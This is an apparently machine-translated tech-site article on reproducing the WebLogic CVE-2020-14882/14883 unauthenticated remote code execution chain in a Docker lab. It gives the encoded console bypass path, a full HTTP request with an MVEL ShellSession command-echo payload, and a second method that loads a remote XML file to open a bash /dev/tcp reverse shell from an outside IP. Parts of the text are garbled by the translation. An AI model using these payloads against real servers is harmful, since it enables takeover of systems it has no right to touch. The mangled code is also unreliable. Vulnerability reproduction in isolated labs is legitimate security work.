Shulou(Shulou.com)05/31 Report--

This article shows you how to achieve weblogic unauthorized command execution vulnerability reproduction, the content is concise and easy to understand, absolutely can make your eyes bright, through the detailed introduction of this article, I hope you can get something.

Brief introduction

   WebLogic is one of the main products of American Oracle Company, and it is the main J2EE application server software in the commercial market. It is also the first successful commercial J2EE application server in the world. It is widely deployed and applied in Java application server.

Overview

On October 21,   , Oracle officially released an announcement of high-risk vulnerabilities for hundreds of components. Among them, the combined use of CVE-2020-14882/CVE-2020-14883 can enable unauthorized attackers to bypass restrictions such as WebLogic background login, and finally remotely execute code to take over the WebLogic server, which is extremely difficult and risky.

   vulnerabilities here are found in the console of WebLogic. This component is native to the full version of WebLogic, and the vulnerability is exploited by the HTTP protocol.

   CVE-2020-14882 allows unauthorized users to bypass the administrative console's permission authentication to access the background, and CVE-2020-14883 allows any background user to execute arbitrary commands through the HTTP protocol. Using a chain of exploits made up of these two vulnerabilities, commands can be executed as an unauthorized arbitrary user on a remote Weblogic server through an GET request.

Affect the version

WebLogic 10.3.6.0.0WebLogic 12.1.3.0.0WebLogic 12.2.1.3.0WebLogic 12.2.1.4.0WebLogic 14.1.1.0.0

Environment building

Here, use the environment of vulhub to reproduce, and create a new docker-compose.yml.

Version:'2'

Services:

Weblogic:

Image: vulhub/weblogic:12.2.1.3-2018

Ports:

-"7001VR 7001"

Execute the following command to download the image and start a container with the image on port 7001

Docker-compose up-d

Loophole recurrence

Permission bypass vulnerability (CVE-2020-14882) is repeated:

   because the unauthorized access vulnerability of CVE-2020-14882 is to bypass the permissions of the management console to access the background, you need to have a console console and open a browser to access:

Http://ip:port/console

   found that there is a management console in the previous step, and we will be asked to enter the account password when we normally access the console backend. Through unauthorized access, you can directly bypass authentication and log in to the background.

URL:/console/css/%252e%252e%252fconsole.portal

Unauthorized access to the console page:

Enter the account password normally and log in to the console page:

By comparison, you can see the difference between the backend through unauthorized access and normal login. Due to insufficient permissions, lack of deployment and other functions, it is impossible to install applications, so it is impossible to directly obtain permissions through the deployment of war packages in the background. "% 252E%252E%252F" is the ".. /" encoded by the secondary url, through which unauthorized access to the relevant management backend can be achieved.

Arbitrary command execution vulnerability in background (CVE-2020-14883) is repeated:

Mode one of utilization

Com.tangosol.coherence.mvel2.sh.ShellSession

However, this utilization method can only be used in Weblogic 12.2.1 and above, because the com.tangosol.coherence.mvel2.sh.ShellSession class does not exist in 10.3.6.

Execute the "id" command burpsuite in version 12.2.1.3

GET / console/css/%252e%252e%252fconsolejndi.portal?test_handle=com.tangosol.coherence.mvel2.sh.ShellSession (% 27weblogic.work.ExecuteThread%20currentThread%20=%20 (weblogic.work.ExecuteThread) Thread.currentThread ();% 20weblogic.work.WorkAdapter%20adapter%20=%20currentThread.getCurrentWork ();% 20java.lang.reflect.Field%20field%20=%20adapter.getClass () .getDeclaredField (% 22connectionHandler%22); field.setAccessible (true); Object%20obj%20=%20field.get (adapter) Weblogic.servlet.internal.ServletRequestImpl%20req%20=%20 (weblogic.servlet.internal.ServletRequestImpl) obj.getClass () .getMethod (% 22getServletRequest%22) .invoke (obj);% 20String%20cmd%20=%20req.getHeader (% 22cmd%22) String []% 20cmds%20=%20System.getProperty (% 22os.name%22). ToLowerCase (). Contains (% 22window%22)% 20?%20new%20String [] {% 22cmd.exe% 22String% 20% 22cmd% 22cmd}% 20:%20new%20String [] {% 22binram% 22cmd}% 22cmd} If (cmd% 20 percent) {% 20String%20result%20=%20new%20java.util.Scanner (new%20java.lang.ProcessBuilder (cmds). Start (). GetInputStream ()) .useDelimiter (% 22\ A% 22) .next ();% 20weblogic.servlet.internal.ServletResponseImpl%20res%20=%20 (weblogic.servlet.internal.ServletResponseImpl) req.getClass (). GetMethod (% 22getResponse%22) .invoke (req); res.getServletOutputStream (). WriteStream (new%20weblogic.xml.util.StringInputStream (result)) Res.getServletOutputStream () .flush ();}% 20currentThread.interrupt (); HTTP/1.1

Host: 192.168.74.141:7001

Pragma: no-cache

Cmd: id

Cache-Control: no-cache

Upgrade-Insecure-Requests: 1

User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.198 Safari/537.36

Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9

Accept-Encoding: gzip, deflate

Accept-Language: zh-CN,zh;q=0.9,en;q=0.8,zh-TW;q=0.7,en-US;q=0.6

Cookie: ADMINCONSOLESESSIONThe ufkDQ2WXPmMBVQWCpxVBrNdKxp4L58RThe PTssNxYAmgnYPUBE4YPUBUFKDQ2wG1qZzw0xxXmwGtMQcPpJ0GVJrg0pv0LGCS6LdH0g1599365627

Connection: close

Echo payload:

/ console/css/%252e%252e%252fconsolejndi.portal?test_handle=com.tangosol.coherence.mvel2.sh.ShellSession (% 27weblogic.work.ExecuteThread%20currentThread%20=%20 (weblogic.work.ExecuteThread) Thread.currentThread ();% 20weblogic.work.WorkAdapter%20adapter%20=%20currentThread.getCurrentWork ();% 20java.lang.reflect.Field%20field%20=%20adapter.getClass () .getDeclaredField (% 22connectionHandler%22); field.setAccessible (true); Object%20obj%20=%20field.get (adapter) Weblogic.servlet.internal.ServletRequestImpl%20req%20=%20 (weblogic.servlet.internal.ServletRequestImpl) obj.getClass () .getMethod (% 22getServletRequest%22) .invoke (obj);% 20String%20cmd%20=%20req.getHeader (% 22cmd%22) String []% 20cmds%20=%20System.getProperty (% 22os.name%22). ToLowerCase (). Contains (% 22window%22)% 20?%20new%20String [] {% 22cmd.exe% 22String% 20% 22cmd% 22cmd}% 20:%20new%20String [] {% 22binram% 22cmd}% 22cmd} If (cmd% 20 percent) {% 20String%20result%20=%20new%20java.util.Scanner (new%20java.lang.ProcessBuilder (cmds). Start (). GetInputStream ()) .useDelimiter (% 22\ A% 22) .next ();% 20weblogic.servlet.internal.ServletResponseImpl%20res%20=%20 (weblogic.servlet.internal.ServletResponseImpl) req.getClass (). GetMethod (% 22getResponse%22) .invoke (req); res.getServletOutputStream (). WriteStream (new%20weblogic.xml.util.StringInputStream (result)) Res.getServletOutputStream () .flush ();} 20currentThread.interrupt ()

Execution in version 10.3.6 will report an error

Mode 2 of utilization

Com.bea.core.repackaged.springframework.context.support.FileSystemXmlApplicationContext

This is a more aggressive approach, first proposed in CVE-2019-2725, and works for all Weblogic versions.

First, we need to construct a XML file and save it on a server that Weblogic can access. Here, we perform a bounce shell operation, such as

Http://example.com/rce.xml:

/ bin/bash

-c

& / dev/tcp/ip/1234 0 > & 1]] >

Nc listens, and then executes an get request:

Http://192.168.74.141:7001/console/css/%252e%252e%252fconsole.portal?_nfpb=true&_pageLabel=&handle=com.bea.core.repackaged.springframework.context.support.FileSystemXmlApplicationContext("http://139.9.198.30/rce.xml")

The port that nc listens on gets bounced shell

After testing, this method can be executed in both 12.2.1.3 and 10.3.6 versions.

Vulnerability repair

At present, Oracle has officially released the latest patch for this vulnerability. Please download the patch and install the update in time. The official Oracle patch requires users to have a licensed account for genuine software, and after logging in to https://support.oracle.com using this account, you can download the latest patch.

The above is how to reproduce weblogic unauthorized command execution vulnerabilities. Have you learned any knowledge or skills? If you want to learn more skills or enrich your knowledge reserve, you are welcome to follow the industry information channel.

Welcome to subscribe "Shulou Technology Information " to get latest news, interesting things and hot topics in the IT industry, and controls the hottest and latest Internet news, technology news and IT industry trends.